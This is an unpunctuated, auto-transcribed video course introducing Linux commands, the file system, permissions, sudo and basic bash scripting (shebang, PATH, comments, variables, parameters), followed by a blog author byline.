create another folder and then call   it bar create so now within documents we have  F and bar so we have two directories cool so   here let’s just press contrl + C I’m going to  type LS so you can see that we are able to see   desktop and here documents right so what we can  do is we can say LS and then the argument so we   want to list the contents of the folder called  documents so make sure that this is capital D   so the exact same name here I can press tab to  autocomplete press enter and have a look we see   F and bar so these are two folders that we are  seeing within documents so you can see that this   is the command and this is the argument we could  also say LS in here and if I go back and I can   say Dash and then a space enter and basically  we just see bar and then Fu okay so there’s no   hidden files Within the documents folder so this  is pretty much what a command is obviously there   are plenty of other commands which I’m going to  go through with you in this course but you should   know what a command is what are options and also  what are arguments in here so here there’s just   one argument but some commands might have multiple  arguments and also I actually forgot so remember   I said that commands they are case sensitive so  LS in here so if I type this command basically   command not found so this command is not the same  as LS in lowercase cool now that you know about   commands options and arguments next let me walk  you through the manual pages or simply the man page in this section let’s focus our attention  in Le in the Linux file system which is the   hierarchical structure used to organize and manage  files and directories in a Linux operating system   it follows the tree structure with the root  directory so here you can see this is the   root at the very top and all other directories  are organized below it so here we have bin is a   directory Etc another directory sbin USR VAR dev  then we have have home lib Mount opt proc root   so on and so forth so in this section basically  I want to give you the overview so that we can   start exploring and start using the CD command  PWD on all that good stuff so basically you have   the root in here and then after root you have all  the directories in here so sbin which is used for   essential user commands binaries so here bash gut  CP date Echo LS uh less kill and then basically   all of this commands are used before the USR so  here is mounted because within this USR so here   you can see that there’s also a for slash bin in  here right so these is where you find the programs   right so binaries are programs then you have Etc  so here it’s mainly used to store configuration   files for the system so here you can see fonts  Chown tabs in it and profile uh shells time zone   and whatnot so these are mainly for configuration  files then we have the sbin so sbin is similar to   bin but only for the super user then we have  USR or you can say user so here it’s read only   application support data and binary so you can  see binaries in here for SL include in here lib   right so here basically some code and packages and  also uh you can see some local software which is   stored as well under for SL looc you also have  the for/ share which is static data across all   architectures then we have the VAR so this was  initially uh named as variable because it was   used to store data that change frequently so here  you can see uh youve got cache so application   cache data lib data modified as program runs  lock for lock files to track resources in use   then log files are stored in here variable data  for installed packages and opt es poool tasks   waiting to be processed here you’ve got es poool  and then cron cups and mail and basically here   is where you store temporary data so once the  system reboots then the data is gone you have   Dev in here so this is for device files then we  have for slome so this is the home directory and   we’ll come back to this in a second you have lib  so here for libraries and carel modules Mount so   here Mount files for temporary file systems  such as USB then we have opt for optional   software applications proc for process and kernel  information files for/ root so this is the Home D   for the root user and this is pretty much it now  obviously here I’ve schemed through it and um as   you go through your journey in terms of learning  Linux and um using the command and navigating your   way around and even you know building software  then you start to familiarize yourself with all   all of these folders in here that I’ve just  talked about so this actually is from the   Linux Foundation org I’ll leave a link where  you can basically go and read more in detail   about what each of these folders and subfolders  do but this is pretty much the Linux file system   in a nutshell next let me go ahead and show you  how we can navigate around within the Linux file system all right so in here I’m with in my  terminal and let’s together explore the Linux   file system together so I want you to type this  command in here so CD in here literally just type   CD and then for Slash and then space and then  for slash so this whatever you are just type   CD and then for SL now CD in here means change  directory and basically allows us to change from   one location to another So currently I’m within  the home directory and I want to see I want to   change directory into forth slash so for slash  is the root so press enter now we are within root   if I type PWD it just gives us forth slash which  means root nice if I type LS so list directories   and basically so list the contents within this  directory press enter in here so anytime that   you see something which looks you know something  like bin lib proc serar boot Dev ety Mount up   temp user this is basically the Linux file system  from root so remember I’ve showed you so in here   we have root and then we have ban at C SB user  VAR Dev home lib so if I go back so have a look   bin lib VAR temp user in here so on and so forth  media Mount opt home as well in here have a look   home right so this is pretty much it now what I  want to do with you is so let me just clear the   screen crl L and in here let’s together type this  command we’re going to say PSE sudo and we’ll come   back to P sudo and a also apt we’ll come back to  this in a second and then say install and then   tree so this is basically a way of us installing  extra binaries into our operating system so press   enter Then adding the password and I’m typing  trust me but you can’t see press enter and now   this is installing the tree binary and there we  go so now if I type in here so I just clear the   screen I’m going to type tree or actually let’s  just say which and then tree press enter you can   see that this is under user bin and then tree  okay so it means that we have this binary that   we can use now this binary here so tree so here  I’m going to pass an option so the option will be   Dash and then capital l in here and then I have  to pass an argument into this option and press   enter and literally what this basically gives  me is this nicely formatted LS so basically we   are lising the directories within the root folder  but this is nicely formatted for us so here you   can see we have bin we have boot we have Dev we  have ety we have home lib and also these arrows   in here I’ll come back to them in a second but  in here so temp as well V are so this is pretty   much the Linux file structure from root and you  can see currently there’s 20 directories and   one file so the file is this swap. IMG awesome  next let’s go ahead and learn how to use the CD command all right so in order for us to navigate  around the Linux file system we need to use the   CD command so here let me just put this full  screen and clear the screen crl l so we need to   use the CD and then command so CD and if I press  tab let’s just press tab in here so this now is   giving me the list of all available option right  so here if I want to now move into the directory   called let’s say temp for example so this is where  temporary files are stored I can just say DM press   enter and now you can see that this reflects so  this is all my zsh and it’s telling me that I’m   within the temp folder and now if I press LS  and you can see that there are some files in   here so these are temporary files so if I say  ls- a and um yes so you can also see the dot so   file started with Dot in here and if you want more  information about it ls- and in here you can see   that basically anything that starts with d in here  and I’ll come back to what all of this means in a   second but these are directories in here and these  are files in here okay which means that we can you   know navigate into the snap and then private temp  or system d right so I’m not going to do it this   is p myit now I’m inside of so let me just press  control Z and then clear the screen I’m inside   of temp folder right here so let’s just type  this command and I want to go back to the root   again so how do I do it well I’ve got couple of  options I can say CD and then for slash root or   I can basically go back one folder right so here  if I say CD dot dot so this goes back a folder   so you see from temp it went back to root so if I  type CD TMP in here press enter again I can type   CD for slash so this is actually going directly  to the location instead of going back a folder   press enter and we get the same thing what about  if you want to switch between these two folders   for example right so you don’t want to say CD and  then temp or CD dot dot well you could just say   CD and then Dash and basically this flips between  the previous and the current folder and this goes   back to the previous folder whatever it is within  the file system so if I press enter I go back to   Temp if I press CD and then Dash again I should  go back to root have a look I went back to root   in here cool so I’ll show you more examples of  this in a second and this is pretty much how   you navigate around the Linux file system so  if I type LS once more clear the screen enter   you should see a bunch of folders if you want to  navigate into a particular folder you just say   CD let’s go into bin for example CD and then bin  this and then press enter and now I’m within bin   in here if you want to go for example within  media you don’t necessarily have to go back a   folder you could just say CD for Slash and then  media right so because media is within the root   right here press enter and you can see that now I  went back to Media if I type CD Dash This should   take me back to where think for a second so this  goes back to the previous location which was Bin   press enter you can see that now I’m within bin if  I press up arror and then CD Dash I should go back   to Media enter and you can see that I’m within  media this is pretty much it catch me on the next one all right in this section let’s focus our  attention in terms of working with files and   also in the next section I will show you file  permission in this section let’s focus our   attention in terms of working with files and  later I’ll show you um also directories and   then we’ll learn about permissions so in Linux  in here so you’ve seen that if I open the so   this folder files so in here remember if I click  on these three lines I can basically show hidden   files right how do we create files manually  with Linux so one we have two options so we   could use the UI and we could open so let’s  just open any of these so zshrc and this will   bring the text editor so here what we could do  is we could create a new document and here I   could say hello and then Amigos and then I can  save this I can give the destination so let’s   let’s just save it into documents I’m going  to say hello.txt and there we go close the   file close this let’s navigate to documents  so CD and then documents so you’ve learned   about the CD command LS and you can see that we  have our file in here right so obviously that   is the wrong way of doing that so hopefully  in this section we’ll go through in terms of   how to work with files creating files deleting  them and moving them to a different directory   I’ll show you how to print them as well and also  how to zip any file cool let’s begin in the next video cool in order for us to create a file with  Linux we have this command called touch so this   command allows us to create a file so here let’s  just say buy so buy. txt now obviously here if I   don’t specify the location and just give the  name so this is the name of the file so this   will be saved under the current working directory  which currently is documents right so home and   then documents so if I press enter now let’s type  LS and you can see that we have the file in here   called by. txt so this is how to create files  now obviously this file in here is empty let me   show you so before I actually show you the Linux  command in order for us to print this file if I   open up files in here and then let’s navigate  to documents we have buy. txt let’s open that   up and you can see that it’s absolutely empty so  this is to much how to create an empty file now   obviously it’s not useful because you know most  of the times what we want to do is to create a   file with some content so there are a couple ways  that we can do that and one way is for us to use   the echo command so here I’m going to say Echo  and here we have to pass a string and here I’m   going to say for example by by and then Maria for  example right so this is just a random string now   if I press enter this command just prints back  by Maria now what I can do is I can take this   command and then redirect to the file so here  I can give an existing file name or I can give   it a brand new file so let’s just overwrite the  file that we have which is b.txt so here by. txt   press enter and we get nothing so here we know  that basically if you don’t see anything on the   console and the command just run and executed  you know that it works so let me just clear the   screen crl L LS we have our buy. txt now if we  want to view the contents let’s just again just   open files and here let’s go to documents buy.  txt and sure enough we have buy and then Maria   so this is pretty much how to create a file both  an empty file as well as passing some string or   some output into the file so basically we use use  the echo command in here and then we pass a string   and then we say by. txt or if you want an empty  file you could just say basically so here you can   use the touch command okay so this is touch and  then you can say whatever right so lol and you   don’t even need the extension so here if I say  enter and then LS you can see that we have buy.   txt we have F we have low. txt actually these  are folders so I think we did these before we   created these folders before and um yeah so this  is pretty much it so if I open of files again once   more go to documents you can see that we have  three files in here both with extension and uh   without extension cool there’s another way that  we can create files which is so basically let’s   say that you want to type a couple of things  uh before you actually uh submit the content so   here you see that I’m just saying Echo and then  by Maria I’m redirecting the output from this   command into this file but maybe you want to type  a document or a piece of code right so this is not   feasible and I’ll show you later with Vim how to  do it but for now these are the basics of creating files cool in this section let’s learn how to work  with folders or directories so you saw that we   can basically create files we can delete files  through the terminal using commands and so far   I’ve been creating folders by right clicking and  then new folder and also the same with deleting   folders right click and then basically I think  it’s moved to trash in here right so there’s   better ways of doing it and through the terminal  we can use the mkdir so this right here allows   us to create folders or directories so in here  let’s just CD into and then add documents and let   me put my font a little bit smaller just like  that clear the screen now if I want to create   a folder in here I can say mkd I bar and then  hello bar for example so this now is the name   of my folder press enter and you can see that  we have a folder in here called hello and then   bar if I want to delete a folder which is empty I  can say rmd iir so this actually will remove the   folder only if it’s empty right so here if I press  enter you can see that the folder is no longer in   here if you want to create a folder or basically  nested folders you say mkd I Dash and then P so   Dash p in here and then you can say f for slash  in here and then the bar press enter and in here   actually uh I think we had a folder called Fu  which was here so it didn’t actually create a   new folder but basically inside of Fu now you can  see that we have a new folder called bar so let   me just go back in here and what I’m going to  do is I’m going to run the exact same command   but I’m going to say for example here test and  then bar now you can see that we have a folder   called test and inside of test we have a folder  called bar now if we try to delete so let’s just   say rmdir and then the folder called test in here  press enter you can see that RM failed to remove   test because it’s empty right so rmd just deletes  the folder if it’s empty remember how to delete   the files so we can use the RM command in here so  RM dashr in here and then I’m going to say f to   basically Force delete and accept the prompt so R  for recursive and then here I can say the name of   the folder which is test now this is the key so  if I say in here for Slash and instore right so   pretty much just delete anything under test and if  I open up test you can see that we have bar so if   I press enter here this is still going to prompt  me yes or no so because we have the force here so   let’s just press n for a second so what we want to  do is just add a trailing for slash so this will   basically remove without prompting it’s just going  to remove every single folder and subfolder so if   I press enter you can see that now the folder is  gone and we kept the parent folder in here so if   you want to keep let’s say you want to keep the  parent in here so let’s just again create a new   folder so make the- p test bar let’s also say bar  and then two or three doesn’t really matter and   let’s just have two in here right so here inside  we have three folders if you want to delete them   all all you do is you say rm-rf the name of the  folder for slashstar for slash so here you could   also do a pattern right so let’s just say you  want to delete anything that ends with three for   example so three in here press enter and you can  see that only the folder that ended with three was   gone right so star means pretty much any folder  right so also if for example here so you have   bar so let’s just create a new folder inside of  bar two for example so here I’m going to say FU   press enter now within bar two we have Fu okay  so I’ve just said- P to create subfolders so if   I was to reun the command in here so this will  pretty much just delete all subfolders including   folders within folders right so if I press enter  you can see that it’s gone and we can’t go back   right because the folder doesn’t exist so the  parent which was bar two doesn’t exist so here   let me just say okay and go to documents and test  and you can see that all folders are gone if you   want to delete basically everything including  the parent all you do is so let’s just create   a new folder here so basically bar two inside  with f so this is the command and you want to   delete everything including the parent folder  which is test all you do is mkd and then Dash   oh actually sorry rm-rf so D RF or f r is the  same thing but I’ve just switch the options   and then the name of the folder test then press  enter and you can see that the folder is now gone   and this is pretty much how you create folders  but also delete contents within your folders Linux is a multi-user environment where allows  us to keep users files separate from other users   we can add a new user by using the pseudo and  then user ad- M so this is a flag that allows   you to create the home directory and then you  pass the name we can also set the password for   the particular user by using the pass WD and  then the user in question and if we want to   switch between users we use the Su command I.E  substitute user if you also want to delete the   user you can say user Dell and then here we can  pass some flags and then the user in question   but I’ll show you the flags in question as well  so and with this we have two types of user we   have a normal user that can modify their own  files this user cannot make systemwide changes   install software update system files and also  cannot change other users file so You’ seen the   pseudo command I think throughout this course but  I didn’t cover it but I’ll show you in a second   when we try to install for example a package then  we are not allowed to do that unless we use the   pseudo command and then we have the super user  in here I.E root and this user can modify any   file on the system it can make systemwide changes  such as install software and even change files on   the operating system so in this section let’s  understand basically how all of this works and   then we also touch on files and permissions  which is very important and this is actually   very important that you must understand how it  works because it’s key towards your journey in   terms of becoming a Linux administrator  if you want to follow that path but for   a regular software engineer still crucial for  you to know how this works because it’s key to Linux cool you’ve seen that if I was to type this  command and we’ll learn about package managers   later but here let’s say that we want to install  a piece of software in our machine so basically a   binary so here I think you’ve seen this APK or  I think no it’s apt and then install and here   let’s just say tree so here just say tree and we  did this before but let’s just understand exactly   what we had to do to install this software  if I press enter in here it says could not   open lock file permission denied have a look  permission denied and then it says enable to   acquire the front end log blah blah blah are  you roote well so in order for us to execute   this command successfully we need to execute  this as root I.E with the pseudo command so   the way we do it is we can type in here pseudo  so PSE sudo this is the command that we need to   use and then here I’m going to say exclamation  mark exclamation mark twice and then press Tab   and basically this just adds in the previous  command that I had in my terminal and now if   I press enter now it’s actually asking me for the  password you’ve seen this before so here I’m going   to add the password so it looks like I’m not  typing but trust me it’s hiding the password   for security reasons so just type your password  and then press enter and in fact if I basically   have a wrong password press enter it will say that  the password was incorrect so now I need to type   the password again so here I’m going to type the  correct password press enter and you can see that   basically it tries to install but this is already  installed so this dependency is already installed   as we did before similarly if we try so in here  if I try to navigate to CD and then the root so   for slash LS so in here we have couple of folders  in here but one is root so let’s just try and say   LS and then root for example press enter you  can see that it says LS cannot open directory   root permission denied so if we want to execute  this command on this particular folder we need to   execute the exact same command as root so here  we can say pseudo LS and then root or if I add   exclamation mark exclamation mark twice tab it  just brings in the previous command so this is   a nice trick that I use all the time so if I press  enter now you can see that now we are able to list   the contents inside of the root directory so for  you this might say snap or it might say something   different or maybe nothing right but you can see  that with this command we have super powers now   obviously this here you have to be really careful  how you use this command so remember I said never   do this so sud sudo rm-rf in here and then root  right because if you do this basically you are   getting rid of your entire operating system and  you don’t want to do this so obviously you need   to be careful who you choose to allow to have  the super powers and I’ll will show you this   later in a second but this is the main idea  and basically this is the pseudo command in   NHL pseudo executes a given command with elevated  Privileges and these privileges are required to   perform certain tasks which are required by admins  let’s explore pseudo even further in the next video if you remember correctly when we  do an LS so if we type LS in here so LS   and then Dash a l you can see that we have  some output in here that contains a bunch   of information so in here have a look so we’ve  got that we’ve got this we’ve got all of this   and basically we have some information and  then this is the actual file itself right   so file or directory so in this section we’re  going to focus on understanding the files and   permissions in here and also I’ll explain the  uh output from the ls command so in here if   you remember correctly so if I type in here  ls- Dash and then help and then scroll up in   here so remember the dash so Dash and then l  in here use a long listing format so that’s   why you see all of the information and then  – A as well for Eden file in here so do not   ignore entry that start with DOT right which is  basically all of this right so this dot in here   so the dot files are for the- a and then the  L is for long listing which is for all of this   information in here cool let’s go ahead and uh  start learning about Linux files and permissions next in here I do have this awesome diagram where it  teaches about the output of the command ls- L and   more specific we’ve got the permissions here  which is the core of this section but let me   actually start from here and explain the output  for uh ls- L now in here you can see that we have   the folder name or the file basically the name of  the file that you list within that directory so in   our case we got food. txt as well as di so this  is the name of a folder in here and this could   be literally anything then we have the date and  time and this more specific is the last modified   date and time okay so if you create the file  so that will basically be the creation time and   if you change or modify the file then this will  reflect then we have the size so for a file this   is 4 kilobytes then for a directory this is 4,000  kilobytes and basically the total of whatever is   inside of the folder last section you’ve learned  about groups so this is the group name so to which   group the file belongs to so in this case Amigos  code so both files and then we have the owner so   the owner is the user so in my case Amigos code  earli on you saw that we created a user called   Jamal so this also will reflect then here we have  the number of hard links so two and one and we’ll   come back to hard links later then we have in here  the permissions and the very first character in   here so basically this so excluding D basically I  can’t select it but basically the first character   of this sequence in here it’s always the file  type and then we have the set of permissions   now for the file type in this case d stands for  for directory and then Dash stands for basically   a regular file now when it comes to permissions  this is divided into three sections as I said the   first one is the file type and then and then rwx  rwx r-x in here so basically what this means is   read write and execute R for read W for write and  X for execute the first three characters belongs   to the user so this means that a user can perform  a set of actions on the file type the second set   of characters so the first three for the user  the second three for the group so these are group   permissions and the last three are for everyone  else or others so if it doesn’t belong to the   user nor the group then the rest of of the world  and here’s an example so for example for this file   in here called f.txt so you can see that the file  type in here Dash so it’s a file read W and then   Dash so this means that Amigos code user can only  read and write it cannot execute and we’ll come   back to execute in a second so once we create a  Bash script but also for folders execute Works   a little bit different then the next three set  of characters read write and then Dash so when   it’s a dash it means that there’s no permissions  in there so here Amigos code group so the group   can read and write and then the last three are  dash dash it means that anyone can literally   read so we’ll go into details uh in a second in  terms of the actual permissions but this is the   general overview of the Linux file permissions  and they more specific when you perform ls- L   this is basically the output but as I said in  this section we want to focus on the permissions themselves we’re done with Linux and that’s not  Myer feat you’ve learned about some key commands   and you’re already on your way to becoming  an expert but how do we group those commands   together well that’s where shell scripting  comes in is shell scripting like a programming   language such as python or goang exactly  so you learn about conditions and Loops you   learn about functions how to do effective error  handling and that’s not all we have challenging   exercises waiting for you to put your skills  to the test I’m looking forward for it so am I scripting is where Linux comes in really handy  let’s dive into shell scripting a game changer   for anyone who wants to automate tasks in Linux  first things first what is Bash Bash stands for   Born Again shell a bit of a fun name isn’t it  it’s essentially a command line interpreter   which in simple terms means it’s your gateway  to communicate with your computer using text   based commands with bash you boost efficiency  Skyrocket productivity and can effortlessly   streamline tasks that might otherwise be tedious  think of bash as a way to create a sequence of   commands automating tasks and Performing complex  operations without breaking a sweat now how do   you write these magical scripts all you need to  start is an editor it could be as simple as Vim   which we’ve covered in this course or a feature  editor like Visual Studio code your choice once   you’ve penned down your script save it with  the extension Dosh which tells your system   hey this is a bash script now let’s explore  some fundamental elements of bash scripting   as we talk remember the true understanding  comes from practical application which we’ll   delve into shortly first up variables think of  them as containers they store and manipulate   data for you typically denoted by something like  dollar Vore name variables can hold a variety of   data be it strings numbers or even arrays  moving on to conditionals they are scripts   decision makers allowing it to make choices  based on specific conditions based on whether   something is true or false different blocks of  code will run making your scripts Dynamic and   responsive next up loops loops let you repeat  instructions over and over as needed with for   loops and while Loops you can iterate over  lists sift through directories or continue   a task until a specific condition is met last  but not least functions imagine grouping a set   of commands into one block you can call upon this  block or function multiple times throughout your   script they’re the essence of code reusability  modularity and organization in your script which   is a very key component when it comes to script  writing and there you have it an introduction to   Shell scripting with bash while this is just the  tip of the iceberg armed with these fundamentals   you’re well in your way to master the art of  scripting Linux so without further Ado let’s get started let’s write a simple script to get  a taste of B scripting in this example we’ll   create a simple script to greet the user first  let’s create our script we can use the touch   command followed by the name of our script let’s  call it my first script and make sure you use the   extension Dosh which indicates that these are  bad scripts let’s now open our file using Vim   my first script.sh now the first line of every  file starts with a shebang line don’t worry too   much about this line at the moment we’ll cover  this in a future video now we Echo hello world   in our script and then we can escape and then  we can save our file using coal WQ exclamation   mark now because scripts are executables we  have to also CH mod our script using CH mod   and we can use the symbolic notation plus X  followed by the script name my first script   and now we can run our script using the dot for/  prefix and my first script and there you have it   H world now this is just a basic example but  B scripting allows you to do so much more you   can manipulate files process data automate  backups and perform complex operations all   through the power of scripting so to become  proficient in B scripting it’s essential to   understand the fundamental concepts that form  the building blocks of scripting let’s briefly   cover some of these Concepts and that’s  all for this video I’ll see you in the next one in this video we’ll delve into an important  concept called shibang the shebang also known as a   hashbang or interpreted directive plays a crucial  role in the execution of bash scripts so let’s   first create a file we can just touch greet Dosh  for example and then press enter now we briefly   touched upon shebang line in the previous video  and that’s the first line that you find in any   bash script where you have followed by bin bash  this line is a she and it serves as a directive   to the operating system on how to interpret the  script in this case we’re asking the system to   interpret the script using the binary bash so the  path after the exclamation mark is essentially   pointing to the specific interpreter or shell that  should handle the script the shebang line provides   flexibility by allowing you to specify different  interpreters or different types of scripts for   example if you’re writing a python script you can  use a shebang line that instead has user being   Python and then you can decide if you want Python  3 or python 2 to ensure the script is executed   using the python interpreter and similar for  scripts written in Ruby for example you’ll just   change this binary to Ruby and so on now let’s  see the impact of the shebang connection suppose   in this bad script we want to print hello world  for example we want to write a greeting message   so first let’s write our she bang with bin bash  and then we do Echo hello world and then we escape   and then colon WQ to save this now remember B  scripts are executables which means we need to   give it the executable permission so to do this  we use a CH mode command followed by the symbolic   notation to give it executable permission so we do  plus X followed by the name of the file so greet   Dosh and then we press enter now this file is an  executable so we can check that this is the case   by running LS followed by the long form option  and as as you can see our greet Dosh file now has   executable permissions which is the X here okay  let’s clear our screen now to run this we can use   a for/ prefix followed by the script name and then  we press enter and as you can see it prints hello   world now this is only one way to run this bash  script we can also use the command sh to run the   bash script so greet Dosh and that gives you the  same thing and we can also use Bash read.sh and   we press enter this is for when you don’t specify  The Interpreter within the bash script so if we   remove our bin bash line or or a shebang line in  the bash script we can use these two commands to   interpret this script as bash great now the She  Bang is not limited to just the bash shell you   can use different interpreters depending on your  needs and by specifying the correct interpreter   in the shebang you ensure that your scripts are  executed consistently regardless of which sh or   environment they’re running so a quick summary the  shebang line starts with the hash followed by an   exclamation mark it specifies The Interpreter or  shell that should handle the script it enables   consistent execution of scripts across different  environments regardless of whatever shell you’re   using even though we’re using the zsh Shell here  it was still able to interpret the GRE Dosh file   as a bash script you can specify different  interpreters for different types of scripts   and the she bang line should be placed as the  first line of the script without any leading   spaces or characters before it and that’s it  thanks for watching and I’ll see you in the next one in a previous video we learned how to run  scripts using slsh and Bash so let’s recall our   simple script greet Dosh so if I do a cat greet  Dosh we can see that this script prints hello   world right now we can run it from its current  directory using for/ greet Dosh but what if we   want to run it from anywhere without specifying  its path well the trick is to place our script   in one of the directories that’s in our path  environment variable the path is an environment   variable that tells the shell which directories  to search for executable files in response to   commands so let’s clear our screen and if I do an  echo of the path environment variable we can see   that there are several directories separated  by colons any executable file placed in one   of these directories can be run from anywhere in  the terminal now a common directory to place user   scripts is user local bin that’s this directory  over here so let’s move our greet Dosh file into   this directory and give it executable permissions  now for this we are going to use pseudo because it   requires super user permissions to move scripts  into this directory so we run PSE sudo and then   move and then our script greet Dosh and we’re  going to move this to user local bin and we’re   also going to change the name to greet so it  becomes easy to run later on so now we can press   enter it will ask you for your password so enter  your password so that’s moved greet Dosh into the   user local bin directory now remember you also  have to CH mod since this is a script so once   again pseudo CH mod with the plus X symbolic  notation followed by user local bin and then   greet so we press enter now the reason we changed  the name to greet is so that for Simplicity this   is how we will call it now let’s clear our screen  now if I has to run the command greet just like   this it will give me hello world without using sh  without using the current directory and if I was   to also change it directory and call greet it will  still work so if I change directory to let’s say   desktop for example I can also run it from here as  GRE so you can see we were able to run our script   using just its name without needing to specify  any path or use for/ sh or bash so to recap by   adding our script to one of the directories in  a path environment variable we can conveniently   run it from anywhere in our terminal this can be  incredibly useful as you build up a library of   custom script just be cautious though and ensure  the scripts you add to Global paths are safe and   intended for Global use and that’s all for this  video Happy scripting and I’ll see you in the next one in this video we’ll explore the concept of  comments and how they can enhance the clarity   and understandability of your script comments  are lines in a script that are not executed as   part of the code instead they serve as informative  text for for us reading the script adding comments   to your scripts is considered a best practice  because it helps you and others understand the   purpose functionality and logic of the script so  let’s take a look at how comments are Written In A   bash script in bash there’s two types of comments  you have a single line comment and a multi-line   comment so let’s first go into our greet Dosh  file VM greet Dosh and then press enter now we   know what the script does it prints hello world  to the console when we run the script so first we   can press I to insert and to write a single line  comment simply start the line with the hash symbol   anything following the hash symbol on that line  will be treated as a comment so print greeting   to the console for muline comments you can enclose  the comment text between colon with single quotes   and then we can have our comments within the lines  enclosed between the single quotation marks so   anything between 6 and 9 will now be considered  a comment this is a multi-line comment and we can   just get rid of this line as well so Escape great  now if I was to exit and save this file and rerun   GRE Dosh you’ll notice that it only prints hello  world even though that in our GRE Dosh file we   have these two lines but because they are being  taken as comments they are therefore not executed   now let’s see the Practical benefits of comments  in action consider a bash script that renames all   txt files in a directory to have a Bak extension  so what we do here is VI extensions. sh file and   then press enter and here we have a for Loop  without comments the script may appear cryptic   especially for someone unfamiliar with the purpose  and inner workings of this for Loop especially for   someone who’s new to B scripting who doesn’t  really know how to write for Loops so in our   case it’s very important for us to write comments  here to improve the understandability so we start   with our hash and then we add our comment so what  we’re doing in this for Loop is renaming all txt   files Tob so we’re changing the extension of the  file now we can use multi line comments to add   more detail as to what the script is doing so to  do this we start with a colon and then the single   quotation mark and also close this with a single  quotation mark So now anything inclosed between   these two quotation marks would be considered  a comment so we can write explanation and then   what we’re doing is looping through all. txt  files in the current directory we are using   the move command as you can see move command to  rename each. txt file to do B and finally the   this part of the code is the syntax so the and  then we can paste that here is the syntax that   removes the txt extension and the pens B okay  let’s save the script WQ and exit let’s just   now cut this file and let’s zoom out a little  bit now notice by adding comments throughout   the script we can provide explanations and context  as to what the script is actually doing making it   easier for others and ourselves to understand the  script’s intention so comments not only help with   the script comprehension but also enable you to  temporarily disable or exclude specific sections   of code without deleting them let’s say we did  want the script to run these three lines or we   we can actually prevent those lines from running  by turning them into comments so let’s go back   into our file and what we do is let’s first do an  i and then add a hash in front of this so now it   turns into a comment and same for the remaining  two lines now you can see this script essentially   won’t run anything because now we’ve turned all  our commands into comments we can exit and we can   save this if we tried running the script we do  for/ extension. sh oops wrong file okay we get   permission denied because it’s not executable so  let’s make it executable sh and then rerun as you   can see nothing happens because all our commands  have now been commented okay and that’s all you   need to know about comments and how useful they  are within our scripts so by adding comments to   your scripts you improve the readability you  can you know Foster collaboration within your   team and you can ensure that the scripts purpose  remains evident throughout the life cycle of the   script so other people can read what the script  is doing and so later if changes need to be made   you know where those changes need to happen okay  thanks for watching and I’ll see you in the next one in this video we’ll delve into the world of  variables variables are an essential component   of bash scripting as they allow you to store and  manipulate data it makes your script Dynamic and   flexible in bash variables are like containers  that hold data such as text strings numbers or   even arrays they provide a way to store values  that can be accessed and modified throughout the   script so let’s look at how variables are created  and used in bash script to create a variable you   simply assign a value to it using the assignment  operator so let’s first create a file and call   this file. SH now first in this file let’s begin  with our shebang b bash and then let’s also assign   a variable called greeting and we can assign it  to the string hello world to access the value of   this variable you prepend the variable name with a  dollar sign so we start with dollar greeting let’s   say we want to use the echo command to Output  the value stored in greeting we just start with   Echo followed by Dollar greeting and then we can  escape and save our file make sure you CH mod your   script to give it executable permission v.sh and  then the/ prefix to run the script and there you   have it hello world now variables in bash are not  constrained to a specific data type they can hold   different types of data such as strings numbers  and arrays let’s create a variable that we can   assign a number so let’s reopen our v.sh and let’s  assign another variable I use all my keyboard to   go to the next line and we can assign the count  variable to the number 42 for example so as you   can see I’m not enclosing the number 42 within a  string because I want this bad script to interpret   this as a number and not a string right and then  we can call this variable using the same format   Echo count then let’s exit save our file and run  our bash script v.sh and there you have it it   prints the number 42 as well as our hello world  now variables can also hold an array so let’s   create another variable called fruits and assign  it to the values apple banana and orange so we do   that using parentheses first element will be apple  second element banana and the third element orange   and then you close your parenthesis and there you  have it the fruits variable assigned to this array   now you can also use variables within strings to  create Dynamic output this is known as variable   interpolation let’s see how we can do that let’s  assign a variable name to the name let’s say armid   for example we can now Echo and then within our  string we can use variable interpolation to say   hello to this variable name and Let’s Escape and  WQ to save and let’s call a.sh and there you have   it hello armid so it’s taken the name variable and  assigned it with within our string so essentially   we’re doing variable interpolation in this case  so the value stored in name is inserted into   the string using the dollar name syntax great  let’s summarize what we’ve learned variables   are created using the assignment operator  equals to access the value of a variable   we prend the name of the variable with a dollar  sign variables can hold different types of data   such as strings numbers and arrays and variable  interpolation allows you to use variables within   strings to create Dynamic output and that’s  all for variables I’ll see you in the next one in this video we’ll dive into the topic of  passing parameters to bash scripts by allowing   inputs from the command line you can make  your script more versatile and interactive   bash scripts can receive input values known  as parameters or arguments from the command   line when they are executed these parameters  allow you to customize the behavior of your   script and make it more flexible let’s look  at how to pass parameters to a b script when   running a script you provide parameters after  the script name so for example let’s say we   had a script.sh file we pass parameters just  like this parameter 1 parameter 2 and so on so   when running a script you provide the parameters  after the script name separated by spaces so the   parameters are all separated by spaces so in  this example we’re executing a script called   script.sh and passing two parameters parameter  1 and parameter 2 inside the B script you can   access these parameters using special variables  dollar one doll two and dollar three let’s look   at an example let’s create the script.sh file and  let’s start with our Shang bin bash and let’s say   we wanted to echo three parameters let’s say  the first parameter parameter one and we use   use a special variable so dollar one which  basically grabs the value of the parameter   passed into the script when we run the script  let’s say we have these lines three more times   so let’s just copy this line here copy and then  paste let’s say now parameter two we have two   and then for parameter three we have three so in  this script snippet we’re using the echo command   to display the value of these three parameters so  Let’s Escape and save this file now when I call   the script.sh I can pass in a parameter so let’s  say the first parameter let’s call it hello and   second parameter hi then press enter as you can  see because we’ve only passed in two parameters   it only prints the first two hello and hi because  this is taken as dollar one and this is taken as   dollar two if I was to pass in a third parameter  let’s call it hey and press enter now we have a   third parameter and it is printed in this third  line excellent so when executing the script with   parameters the values passed on the command line  will be substituted into the scripts parameter   variables dollar one doll two and doll 3 now what  if we wanted to access all the parameters passed   into a script we can do this using a special  variable so let’s go into our script.sh let’s   add another line and let’s say we want to Echo  all parameters right we use a special variable   followed by the at symbol and then quotation  marks and then now let’s save the script and   now when we run it we get all parameters and then  the parameters that we’ve passed into the script   in other words the echo command in that line  will output all the parameters passed to the   script great let’s summarize what we’ve learned  parameters are provided after the script name when   executing a script inside the script parameters  can be accessed using dollar one do two doll three   and so on based on their position and the special  variable dollar at can be used to access all the   parameters pass to the script so by allowing  inputs through parameters you can make your   script more interactive and versatile great that’s  all for this video and I’ll see you in the next one phew well done for reaching  the end of this course but your   journey doesn’t stop here whether  you’re taking the devil’s path or   the software engineering path well it’s  only the beginning we have courses to   help you on this journey it was a pleasure  teaching you and we’ll see you in the next one Assalamualaikum

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog

  • Linux System Administration: Security, Networking, and Virtualization

    Linux System Administration: Security, Networking, and Virtualization

